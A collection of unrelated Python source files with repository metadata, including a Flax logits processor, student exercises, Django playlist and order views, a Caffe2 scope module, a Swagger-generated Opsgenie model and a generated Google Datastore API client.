)
return scores
class FlaxMinLengthLogitsProcessor(FlaxLogitsProcessor):
r"""
:class:`transformers.FlaxLogitsProcessor` enforcing a min-length by setting EOS probability to 0.
Args:
min_length (:obj:`int`):
The minimum length below which the score of :obj:`eos_token_id` is set to :obj:`-float("Inf")`.
eos_token_id (:obj:`int`):
The id of the `end-of-sequence` token.
"""
def __init__(self, min_length: int, eos_token_id: int):
if not isinstance(min_length, int) or min_length < 0:
raise ValueError(f"`min_length` has to be a positive integer, but is {min_length}")
if not isinstance(eos_token_id, int) or eos_token_id < 0:
raise ValueError(f"`eos_token_id` has to be a positive integer, but is {eos_token_id}")
self.min_length = min_length
self.eos_token_id = eos_token_id
def __call__(self, input_ids: jnp.ndarray, scores: jnp.ndarray, cur_len: int) -> jnp.ndarray:
# create boolean flag to decide if min length penalty should be applied
apply_penalty = 1 - jnp.clip(cur_len - self.min_length, 0, 1)
scores = jnp.where(
apply_penalty, jax.ops.index_update(scores, jax.ops.index[:, self.eos_token_id], -float("inf")), scores
)
return scores
| [
"noreply@github.com"
] | elgeish.noreply@github.com |
e1f003b7a5710057b5f83fb6a06df9cb3bdbece6 | 0129b016055daa1aaa1e9e0911f271fa7b38e27e | /programacao_estruturada/20192_166/for/fabio03_questao07.py | cd4394adf0a9e02d7f4115cc0e5c3e96b425cfb6 | [] | no_license | rogeriosilva-ifpi/teaching-tds-course | 7c43ff17d6677aef7b42071929b3de8361748870 | 771ccdc4dc932d0ef5ce6ba61a02b5ee11920d4c | refs/heads/master | 2022-04-04T01:08:45.157185 | 2020-01-30T19:36:57 | 2020-01-30T19:36:57 | 206,439,119 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | def programa():
numero = int(input('Número: '))
limite = numero + 1
soma = 0
for i in range(1, limite):
soma = soma + i
print('Resultado:', soma)
programa()
| [
"rogerio.silva@ifpi.edu.br"
] | rogerio.silva@ifpi.edu.br |
6dcf58f3fdc4af5e1c6f72c92a3d68ba9e34b60c | 34745a8d54fa7e3d9e4237415eb52e507508ad79 | /Python Fundamentals/04 Functions/Exercises/09_Factorial_Division.py | 7a8f98167d64d2071b173c43e8018a4076dbb28f | [] | no_license | DilyanTsenkov/SoftUni-Software-Engineering | 50476af0dc88b267d72c56fa87eeb88d841164b2 | fe446e3a50a00bb2e48d71ab8f783e0a4a406094 | refs/heads/main | 2023-08-12T18:18:42.144210 | 2021-09-25T11:10:38 | 2021-09-25T11:10:38 | 317,235,419 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | def factorial(num1, num2):
first_factorial = first_number
second_factorial = second_number
for i in range(1, num1):
first_factorial *= (first_number - i)
for i in range(1, num2):
second_factorial *= (second_number - i)
return first_factorial / second_factorial
first_number = int(input())
second_number = int(input())
print(f"{(factorial(first_number, second_number)):.2f}")
| [
"noreply@github.com"
] | DilyanTsenkov.noreply@github.com |
15c17f24a24cf077d10cb8262277e8ae5cbf8997 | d696454b3e3473a45e0bb486e93f3742493c86a0 | /music/views/playlist.py | 259f2b90dfa81dcf5dc5cea323f74b53d55c7dde | [] | no_license | jmg/music_camping | 430d04e1c8dec28816975daa8fa5375f2eb02435 | 72816647f70bb0afca5899bad5d1cfbaef4ff889 | refs/heads/master | 2021-06-20T01:57:30.540852 | 2017-01-04T05:11:28 | 2017-01-04T05:11:28 | 40,454,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,274 | py | from base import BaseView
from music.services.song import SongService
from music.services.playlist import PlayListService
from music.models import PlayList, Song, PlayListSong
from django.conf import settings
import threading
class PlayingView(BaseView):
url = r"^playlist$"
def get(self, *args, **kwrags):
playlist = PlayListService().get_playlist()
player_data = SongService().get_player_data()
return self.render_to_response({"playlist": playlist, "player_data": player_data, "settings": settings})
class ChangeSongView(BaseView):
def post(self, *args, **kwrags):
is_next = self.request.POST.get("next") is not None
is_prev = self.request.POST.get("prev") is not None
try:
SongService().play_next_song(is_next=is_next, is_prev=is_prev)
except Exception, e:
return self.json_response({"error": str(e)})
return self.response(playlist_song.song.to_json())
class PlayView(BaseView):
def post(self, *args, **kwrags):
SongService().play_song(self.request.POST.get("song_id"))
return self.response("ok")
class StopView(BaseView):
def post(self, *args, **kwrags):
SongService().stop_song()
return self.response("ok")
class PauseView(BaseView):
def post(self, *args, **kwrags):
SongService().pause_song()
return self.response("ok")
class SelectView(BaseView):
url = r"^$"
def get(self, *args, **kwrags):
return self.render_to_response({})
class AddView(BaseView):
def post(self, *args, **kwrags):
song_id = self.request.POST.get("song_id")
try:
SongService().add_song(song_id)
except Exception, e:
return self.json_response({"error": str(e)})
return self.response("ok")
class DeleteView(BaseView):
def post(self, *args, **kwrags):
song_id = self.request.POST.get("song_id")
try:
SongService().delete_song(song_id)
except Exception, e:
return self.json_response({"error": str(e)})
return self.response("ok")
class PlayingListView(BaseView):
def get(self, *args, **kwargs):
playlist = PlayListService().get_playlist()
qs = [x.song for x in PlayListSong.objects.filter(playlist=playlist)]
columnIndexNameMap = {
0: lambda song: self.render("playlist/song_stream.html", {"song": song, "playlist": playlist }),
1: 'album',
2: 'artist',
3: lambda song: self.render("playlist/actions.html", {"song": song, "playlist": playlist })
}
sortIndexNameMap = {
0: 'name' ,
1: 'album' ,
2: 'artist' ,
3: None,
}
return SongService().open_search(self.request, columnIndexNameMap, sortIndexNameMap, qs=qs)
class CurrentSongView(BaseView):
def get(self, *args, **kwrags):
playlist = PlayListService().get_playlist()
player_data = SongService().get_player_data()
return self.render_to_response({"playlist": playlist, "player_data": player_data })
class MoveSongView(BaseView):
def post(self, *args, **kwrags):
song_id = self.request.POST.get("song_id")
direction = self.request.POST.get("direction")
try:
SongService().move_song(song_id, direction)
except Exception, e:
return self.json_response({"error": str(e)})
return self.response("ok")
class BulkMoveSongView(BaseView):
def post(self, *args, **kwrags):
data = self.request.POST.get("data")
SongService().bulk_move_songs(data)
return self.response("ok")
class SetVolumeView(BaseView):
def post(self, *args, **kwrags):
volume = self.request.POST.get("volume")
SongService().set_volume(volume)
return self.response("ok")
class SetPositionView(BaseView):
def post(self, *args, **kwrags):
position = int(self.request.POST.get("position", 0))
SongService().set_position(position)
return self.response("ok")
class ClearView(BaseView):
def post(self, *args, **kwrags):
PlayListService().clear()
return self.response("ok") | [
"jmg.utn@gmail.com"
] | jmg.utn@gmail.com |
f45a472394de6a4dc8569170a4d0b8cb76b5f712 | 8a5f8dfdd038590a579d14a84558cce2bb930b22 | /AICamera/app/src/main/cpp/caffe2/python/scope.py | 7aa881c0ca815c4f51643bb33d182b18b967b95a | [
"MIT"
] | permissive | blackxer/AICamera | ebc94c663e6f2ea6e8c81290a64bce4e7d369ed9 | 4f0a6a09a2288da2ec7140744b5c2862df114c78 | refs/heads/master | 2020-08-11T19:53:42.388828 | 2019-10-16T01:19:59 | 2019-10-16T01:19:59 | 214,616,987 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,465 | py | ## @package scope
# Module caffe2.python.scope
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import contextlib
import threading
from past.builtins import basestring
from caffe2.proto import caffe2_pb2
# The name scope and device scope when creating a new operator.
_NAMESCOPE_SEPARATOR = '/'
_threadlocal_scope = threading.local()
def CurrentNameScope():
global _threadlocal_scope
if not hasattr(_threadlocal_scope, "namescope"):
_threadlocal_scope.namescope = ''
return _threadlocal_scope.namescope
def CurrentDeviceScope():
global _threadlocal_scope
if not hasattr(_threadlocal_scope, "devicescope"):
_threadlocal_scope.devicescope = None
return _threadlocal_scope.devicescope
@contextlib.contextmanager
def NameScope(prefix, reset=False):
global _threadlocal_scope
assert isinstance(prefix, basestring) or prefix is None, \
"NameScope takes in a string as its argument."
old_scope = CurrentNameScope()
prefix = prefix + _NAMESCOPE_SEPARATOR if prefix else ''
if reset:
_threadlocal_scope.namescope = prefix
else:
_threadlocal_scope.namescope = _threadlocal_scope.namescope + prefix
try:
yield
finally:
assert _threadlocal_scope.namescope.endswith(prefix), \
"The namescope variable is changed from outside NameScope() calls."
_threadlocal_scope.namescope = old_scope
@contextlib.contextmanager
def DeviceScope(scope, node_name=None):
new_scope = caffe2_pb2.DeviceOption()
if scope:
assert isinstance(scope, caffe2_pb2.DeviceOption), \
"DeviceScope takes in a caffe2_pb2.DeviceOption as its argument."
new_scope.CopyFrom(scope)
else:
assert node_name, "At least one argument should be non-null in DeviceScope"
# rewrite node_name if it is explicitly given
if node_name:
new_scope.node_name = node_name
global _threadlocal_scope
old_scope = CurrentDeviceScope()
# nested scope should inherit the node_name if it is not explicitly set
if old_scope and old_scope.HasField('node_name') and \
not new_scope.HasField('node_name'):
new_scope.node_name = old_scope.node_name
# nested scope should inherit the extra_info and merged it with new extra_info
if old_scope and hasattr(old_scope, 'extra_info'):
new_scope.extra_info.extend(old_scope.extra_info)
new_scope.extra_info.sort()
_threadlocal_scope.devicescope = new_scope
try:
yield
finally:
assert _threadlocal_scope.devicescope == new_scope, \
"The device scope is changed from outside DeviceScope() calls."
_threadlocal_scope.devicescope = old_scope
@contextlib.contextmanager
def EmptyDeviceScope():
"""
Allow users to 'disable' the device scope behaviour (so it can be
controlled at a NetDef::DeviceOption level, not overridden at
OperatorDef::DeviceOption level).
This sets the CurrentDeviceScope() to None, so that the field is
not set in CreateOperator(...), etc.
"""
old_scope = CurrentDeviceScope()
try:
_threadlocal_scope.devicescope = None
yield
finally:
_threadlocal_scope.devicescope = old_scope
return
| [
"zhangwei@egova.com.cn"
] | zhangwei@egova.com.cn |
32721484c00e4274922c0d5dce36abc0b6575e1b | d1c67f2031d657902acef4411877d75b992eab91 | /swagger_client/models/team_routing_rule.py | 91124b752ab07d247307aaaa3c98962cbd641c5d | [] | no_license | Certn/opsgenie-python | c6e6a7f42394499e5224d679cc9a449042fcf9c3 | bd5f402f97d591e4082b38c938cbabca4cf29787 | refs/heads/master | 2023-01-01T10:45:13.132455 | 2020-10-27T17:40:01 | 2020-10-27T17:40:01 | 307,769,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,731 | py | # coding: utf-8
"""
Opsgenie REST API
Opsgenie OpenAPI Specification # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class TeamRoutingRule(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'is_default': 'bool',
'order': 'int',
'criteria': 'Filter',
'timezone': 'str',
'time_restriction': 'TimeRestrictionInterval',
'notify': 'Recipient'
}
attribute_map = {
'id': 'id',
'name': 'name',
'is_default': 'isDefault',
'order': 'order',
'criteria': 'criteria',
'timezone': 'timezone',
'time_restriction': 'timeRestriction',
'notify': 'notify'
}
def __init__(self, id=None, name=None, is_default=None, order=None, criteria=None, timezone=None, time_restriction=None, notify=None): # noqa: E501
"""TeamRoutingRule - a model defined in Swagger""" # noqa: E501
self._id = None
self._name = None
self._is_default = None
self._order = None
self._criteria = None
self._timezone = None
self._time_restriction = None
self._notify = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
if is_default is not None:
self.is_default = is_default
if order is not None:
self.order = order
if criteria is not None:
self.criteria = criteria
if timezone is not None:
self.timezone = timezone
if time_restriction is not None:
self.time_restriction = time_restriction
if notify is not None:
self.notify = notify
@property
def id(self):
"""Gets the id of this TeamRoutingRule. # noqa: E501
:return: The id of this TeamRoutingRule. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this TeamRoutingRule.
:param id: The id of this TeamRoutingRule. # noqa: E501
:type: str
"""
self._id = id
@property
def name(self):
"""Gets the name of this TeamRoutingRule. # noqa: E501
:return: The name of this TeamRoutingRule. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this TeamRoutingRule.
:param name: The name of this TeamRoutingRule. # noqa: E501
:type: str
"""
self._name = name
@property
def is_default(self):
"""Gets the is_default of this TeamRoutingRule. # noqa: E501
:return: The is_default of this TeamRoutingRule. # noqa: E501
:rtype: bool
"""
return self._is_default
@is_default.setter
def is_default(self, is_default):
"""Sets the is_default of this TeamRoutingRule.
:param is_default: The is_default of this TeamRoutingRule. # noqa: E501
:type: bool
"""
self._is_default = is_default
@property
def order(self):
"""Gets the order of this TeamRoutingRule. # noqa: E501
:return: The order of this TeamRoutingRule. # noqa: E501
:rtype: int
"""
return self._order
@order.setter
def order(self, order):
"""Sets the order of this TeamRoutingRule.
:param order: The order of this TeamRoutingRule. # noqa: E501
:type: int
"""
self._order = order
@property
def criteria(self):
"""Gets the criteria of this TeamRoutingRule. # noqa: E501
:return: The criteria of this TeamRoutingRule. # noqa: E501
:rtype: Filter
"""
return self._criteria
@criteria.setter
def criteria(self, criteria):
"""Sets the criteria of this TeamRoutingRule.
:param criteria: The criteria of this TeamRoutingRule. # noqa: E501
:type: Filter
"""
self._criteria = criteria
@property
def timezone(self):
"""Gets the timezone of this TeamRoutingRule. # noqa: E501
:return: The timezone of this TeamRoutingRule. # noqa: E501
:rtype: str
"""
return self._timezone
@timezone.setter
def timezone(self, timezone):
"""Sets the timezone of this TeamRoutingRule.
:param timezone: The timezone of this TeamRoutingRule. # noqa: E501
:type: str
"""
self._timezone = timezone
@property
def time_restriction(self):
"""Gets the time_restriction of this TeamRoutingRule. # noqa: E501
:return: The time_restriction of this TeamRoutingRule. # noqa: E501
:rtype: TimeRestrictionInterval
"""
return self._time_restriction
@time_restriction.setter
def time_restriction(self, time_restriction):
"""Sets the time_restriction of this TeamRoutingRule.
:param time_restriction: The time_restriction of this TeamRoutingRule. # noqa: E501
:type: TimeRestrictionInterval
"""
self._time_restriction = time_restriction
@property
def notify(self):
"""Gets the notify of this TeamRoutingRule. # noqa: E501
:return: The notify of this TeamRoutingRule. # noqa: E501
:rtype: Recipient
"""
return self._notify
@notify.setter
def notify(self, notify):
"""Sets the notify of this TeamRoutingRule.
:param notify: The notify of this TeamRoutingRule. # noqa: E501
:type: Recipient
"""
self._notify = notify
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(TeamRoutingRule, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TeamRoutingRule):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"john@oram.ca"
] | john@oram.ca |
b962777592420ddaec641e394930ccb7f4714f4b | 70b339d0b2638a7914d0d56c5edf8a2637c9f4b0 | /Microsoft-budgetCombination.py | 7c5b8974df0f7b5706643a7f2353cba23ce79435 | [] | no_license | pflun/advancedAlgorithms | 9991da7514024e18ba08de8688966b9220e12571 | 5520dbcd26999b98e1229bf03c2f62dd690a2ddc | refs/heads/master | 2023-02-19T12:05:26.902535 | 2023-02-14T06:08:54 | 2023-02-14T06:08:54 | 189,055,701 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,148 | py | # -*- coding: utf-8 -*-
# 给你一个menu,是一个map,key是菜名,value是价格,比如
# "apple": 3.25,
# "chicken": 4.55,
# "cake":10.85,
#
# 然后给你一个budget,比如7.80.
# 要你给出所有菜名的combination,总价要正好符合budget,次序不重要,但不能有重复。
# 比如,如果budget是7.80,他就要求结果是[["apple", "chicken"]],不能是[["apple", "chicken"],["chicken","apple"]]
# 比如,如果budget是6.50,他就要求结果是[["apple", "apple"]]
class Solution:
def budgetCombination(self, menu, budget):
self.res = []
self.used = set()
# corner case: 去掉单一overbudget的
def dfs(menu, budget, tmp, prev):
if len(tmp) > 1 and getSum(tmp) > budget:
res = tmp[:]
self.res.append(res[:-1])
return
for food, price in menu.items():
if food in self.used:
continue
self.used.add(food)
tmp.append(food)
dfs(menu, budget, tmp)
tmp.pop()
self.used.remove(food) | [
"zgao@gwu.edu"
] | zgao@gwu.edu |
f343e24f6f579b9ecca603705a2a764f1b6153c7 | 52c5b78f3afab4573926dd6d0a49e10ee1a77e26 | /myproject/boards/models.py | be05814d747d51aef868e0b17217166717b84237 | [] | no_license | zime-py/eight | d9eefc28a00a8411f3a58b0e931807492bc5bfc2 | 2138b2a8884dea299654ff7c41060c72f183486c | refs/heads/master | 2023-01-11T23:03:53.062441 | 2020-11-14T14:43:04 | 2020-11-14T14:43:04 | 312,831,969 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,017 | py | from django.db import models
class Do(models.Model):
name = models.CharField(max_length=100)
roll = models.CharField(max_length=100) #ForeignKey('auth.user',on_delete=models.CASCADE,)
def __str__(self):
return self.name
class Did(models.Model):
result = models.CharField(max_length=100) #ForeignKey('auth.user',on_delete=models.CASCADE,)
do = models.ForeignKey('Do',on_delete=models.CASCADE,)
def __str__(self):
return self.result
class Done(models.Model):
year = models.CharField(max_length=100) #ForeignKey('auth.user',on_delete=models.CASCADE,)
did = models.ForeignKey('Did',on_delete=models.CASCADE,)
def __str__(self):
return self.year
class Go(models.Model):
position = models.CharField(max_length=100)
do = models.ForeignKey('Do',on_delete=models.CASCADE,)
did = models.ForeignKey('Did',on_delete=models.CASCADE,)
done = models.ForeignKey('Done',on_delete=models.CASCADE,)
def __str__(self):
return self.position
| [
"mahmudhossain836@gmail.com"
] | mahmudhossain836@gmail.com |
e1b381d9aa05348e59d8373f067baaca3e76ac38 | 951d62ecd155103fa77efaa68fb7611ac4b9af4b | /testtask/views.py | 000f7b29ff9b717ae435c4111fc440ba7ef938da | [] | no_license | darkdkl/stdvor_dev | 352cb46e45d943c3b31d430bd84d684979456d7e | c4b9dc8b691f11cf15dda565214036367141765a | refs/heads/master | 2021-09-26T11:14:57.299457 | 2020-01-15T08:08:31 | 2020-01-15T08:08:31 | 234,028,893 | 0 | 0 | null | 2021-09-22T18:23:23 | 2020-01-15T07:59:51 | Python | UTF-8 | Python | false | false | 2,290 | py | from django.shortcuts import render
from django.http import JsonResponse
from testtask.models import Order, Сontact, Product
from django.views.generic import View
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator
from django.http import QueryDict
# Create your views here.
data = [{'name': 'Test', 'e-mail': 'linux@org.ru'},
{'name': 'Test2', 'e-mail': 'linux2@org.ru'}]
def index(request):
print(request.GET)
data = [{'name': 'Test', 'e-mail': 'linux@org.ru'},
{'name': 'Test2', 'e-mail': 'linux2@org.ru'}]
return JsonResponse(data, safe=False)
def serialize(order):
return {
'order_num': order.number,
'date_create':order.date,
'byer': [{ 'name':f'{order.contact.first_name} {order.contact.last_name}',
'tel':f'{order.contact.tel_number}',
'email':order.contact.email,
'address':order.contact.address,
}],
'amount':sum([product.cost for product in order.products.all()])
}
# @method_decorator(csrf_exempt,name='dispatch')
# class ApiView(View):
# http_method_names = ['get', 'post', 'put', 'delete']
# def post(self, *args, **kwargs):
# print(self.request.POST.get('test2'))
# return JsonResponse(data, safe=False)
# def put(self, *args, **kwargs):
# orders = Order.objects.all()
# data = [serialize(order) for order in orders]
# return JsonResponse(data, safe=False)
# def delete(self, *args, **kwargs):
# # print(self.request.POST.get('_method') )
# get = QueryDict(self.request.body)
# print(get.dict())
# return JsonResponse(data, safe=False)
@csrf_exempt
@csrf_exempt
def get_api(request, pk=None):
if request.method == "GET":
orders = Order.objects.all()
data=[serialize(order) for order in orders]
return JsonResponse(data, safe=False)
if request.method == "PUT":
q=QueryDict(request)
print(q.values())
orders = Order.objects.all()
data=[serialize(order) for order in orders]
return JsonResponse(data, safe=False)
| [
"dark.dmake@gmail.com"
] | dark.dmake@gmail.com |
2c600cd8520114fcf732b05492d70efb49e64f23 | 58af092b07edb8d34d8d03886d6bd56d5c34af42 | /english_munchers_dj/telegram_bot/migrations/0001_initial.py | 366e348ec9e185f732a5237448ed2d8c76a0051d | [] | no_license | Vido/freela-em | ced9f79cecc247bd1a42aae744a32155f07d9124 | 78d9ea732d6d869af5bdf78666e41078d7777e0b | refs/heads/master | 2022-12-08T19:27:21.186061 | 2019-03-04T21:54:29 | 2019-03-04T21:54:29 | 110,721,168 | 0 | 6 | null | 2022-12-07T23:49:35 | 2017-11-14T17:15:46 | JavaScript | UTF-8 | Python | false | false | 620 | py | # Generated by Django 2.0 on 2017-12-11 14:40
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='UpdateResponse',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('class_request_id', models.IntegerField()),
('update_dict', django.contrib.postgres.fields.jsonb.JSONField()),
],
),
]
| [
"vido@usp.br"
] | vido@usp.br |
c910db3bd9b777a4af8a0435d71e2fe3a8998987 | be02fd6adb789e8b5f5c8f77b2635b71b1b24a52 | /prob.py | 7e69c9913f33a9eba9130d35476f74ca184f195b | [] | no_license | pavlin-policar/rosalind | 05cd66bec512e7b3ca414effd00e4d1b4ffd563a | d9c8b2ab20e950ef543964fc5e1c47bbf21b8362 | refs/heads/master | 2021-11-25T08:20:28.083661 | 2021-11-07T17:28:50 | 2021-11-07T17:30:50 | 71,159,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | import operator
from functools import reduce
from math import log10
if __name__ == '__main__':
sequence = input()
probabilites = map(float, input().split())
prob = lambda l, p: p / 2 if l in ('C', 'G') else (1 - p) / 2
logs = [log10(reduce(operator.mul, [prob(l, p) for l in sequence], 1))
for p in probabilites]
print(*logs)
| [
"pavlin.g.p@gmail.com"
] | pavlin.g.p@gmail.com |
d98628b7b3a81ff0fe9d3ae51d115f5d3ded0262 | 6444622ad4a150993955a0c8fe260bae1af7f8ce | /djangoenv/bin/python-config | f60d09bc69d85bc162d02850a5fd49608851224d | [] | no_license | jeremyrich/Lesson_RestAPI_jeremy | ca965ef017c53f919c0bf97a4a23841818e246f9 | a44263e45b1cc1ba812059f6984c0f5be25cd234 | refs/heads/master | 2020-04-25T23:13:47.237188 | 2019-03-22T09:26:58 | 2019-03-22T09:26:58 | 173,138,073 | 0 | 0 | null | 2019-03-22T09:26:59 | 2019-02-28T15:34:19 | Python | UTF-8 | Python | false | false | 2,403 | #!/home/mymy/Desktop/Python_agility/cours/Hugo/Lessons_RestAPI/Lesson_RestAPI/djangoenv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
| [
"jeremyrich@free.fr"
] | jeremyrich@free.fr | |
afa20d25cc412db5e1c7a07e46b39a65987b99c2 | d488f052805a87b5c4b124ca93494bc9b78620f7 | /google-cloud-sdk/.install/.backup/lib/googlecloudsdk/third_party/apis/datastore/v1/datastore_v1_client.py | 3390ffe8e1fab09390fda0ae8e4cba82b5321e06 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] | permissive | PacktPublishing/DevOps-Fundamentals | 5ce1fc938db66b420691aa8106ecfb3f9ceb1ace | 60597e831e08325c7e51e8557591917f7c417275 | refs/heads/master | 2023-02-02T04:48:15.346907 | 2023-01-30T08:33:35 | 2023-01-30T08:33:35 | 131,293,311 | 13 | 19 | null | null | null | null | UTF-8 | Python | false | false | 17,492 | py | """Generated client library for datastore version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.datastore.v1 import datastore_v1_messages as messages
class DatastoreV1(base_api.BaseApiClient):
"""Generated client library for service datastore version v1."""
MESSAGES_MODULE = messages
BASE_URL = u'https://datastore.googleapis.com/'
_PACKAGE = u'datastore'
_SCOPES = [u'https://www.googleapis.com/auth/cloud-platform', u'https://www.googleapis.com/auth/datastore']
_VERSION = u'v1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_CLIENT_CLASS_NAME = u'DatastoreV1'
_URL_VERSION = u'v1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new datastore handle."""
url = url or self.BASE_URL
super(DatastoreV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.projects_operations = self.ProjectsOperationsService(self)
self.projects = self.ProjectsService(self)
class ProjectsOperationsService(base_api.BaseApiService):
"""Service class for the projects_operations resource."""
_NAME = u'projects_operations'
def __init__(self, client):
super(DatastoreV1.ProjectsOperationsService, self).__init__(client)
self._upload_configs = {
}
def Cancel(self, request, global_params=None):
"""Starts asynchronous cancellation on a long-running operation. The server.
makes a best effort to cancel the operation, but success is not
guaranteed. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`. Clients can use
Operations.GetOperation or
other methods to check whether the cancellation succeeded or whether the
operation completed despite cancellation. On successful cancellation,
the operation is not deleted; instead, it becomes an operation with
an Operation.error value with a google.rpc.Status.code of 1,
corresponding to `Code.CANCELLED`.
Args:
request: (DatastoreProjectsOperationsCancelRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Cancel')
return self._RunMethod(
config, request, global_params=global_params)
Cancel.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1/projects/{projectsId}/operations/{operationsId}:cancel',
http_method=u'POST',
method_id=u'datastore.projects.operations.cancel',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1/{+name}:cancel',
request_field='',
request_type_name=u'DatastoreProjectsOperationsCancelRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes a long-running operation. This method indicates that the client is.
no longer interested in the operation result. It does not cancel the
operation. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request: (DatastoreProjectsOperationsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Empty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1/projects/{projectsId}/operations/{operationsId}',
http_method=u'DELETE',
method_id=u'datastore.projects.operations.delete',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
relative_path=u'v1/{+name}',
request_field='',
request_type_name=u'DatastoreProjectsOperationsDeleteRequest',
response_type_name=u'Empty',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Gets the latest state of a long-running operation. Clients can use this.
method to poll the operation result at intervals as recommended by the API
service.
Args:
request: (DatastoreProjectsOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path=u'v1/projects/{projectsId}/operations/{operationsId}',
http_method=u'GET',
method_id=u'datastore.projects.operations.get',
ordered_params=[u'name'],
path_params=[u'name'],
query_params=[],
